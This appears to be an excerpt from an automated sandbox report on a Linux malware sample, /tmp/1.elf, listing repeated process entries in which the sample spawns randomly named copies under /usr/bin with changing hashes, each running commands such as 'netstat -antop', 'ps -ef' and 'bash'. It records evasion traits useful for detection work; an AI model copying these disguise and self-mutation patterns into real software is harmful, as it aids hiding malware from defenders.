                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:/usr/bin/gvjfjjanun "netstat -antop" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:/usr/bin/gvjfjjanun uptime 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:23
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/gvjfjjanun
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:4780b1384292ab14583c4f650cf92dc1

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:/usr/bin/fubjkoogoo who 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:/usr/bin/fubjkoogoo "cd /etc" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:/usr/bin/fubjkoogoo "echo \"find\"" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:/usr/bin/fubjkoogoo bash 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:/usr/bin/fubjkoogoo "ps -ef" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:28
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/fubjkoogoo
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:0ea6b59dfc99f2b10cc3bdc90a93485b

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:/usr/bin/ptcfhyyirf "grep \"A\"" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:/usr/bin/ptcfhyyirf bash 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:/usr/bin/ptcfhyyirf "netstat -antop" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:/usr/bin/ptcfhyyirf "route -n" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:/usr/bin/ptcfhyyirf "route -n" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/ptcfhyyirf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:50b1c82c7fcc2c240a21aebd9dea3c69

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:/usr/bin/bsvlwqppmd who 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:/usr/bin/bsvlwqppmd whoami 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:/usr/bin/bsvlwqppmd "grep \"A\"" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:/usr/bin/bsvlwqppmd "sleep 1" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:/usr/bin/bsvlwqppmd "netstat -antop" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:38
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/bsvlwqppmd
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:205f8a5a8b0d1f6be71274fa6ff34534

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:/usr/bin/uhjknuzvai "route -n" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:/usr/bin/uhjknuzvai "ls -la" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:/usr/bin/uhjknuzvai "sleep 1" 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:/usr/bin/uhjknuzvai pwd 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:/usr/bin/uhjknuzvai bash 6205
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

                                                                                                                                                                                    Start time (UTC):18:32:43
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uhjknuzvai
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625889 bytes
                                                                                                                                                                                    MD5 hash:91456298716554fecad3edd5ee4b700a

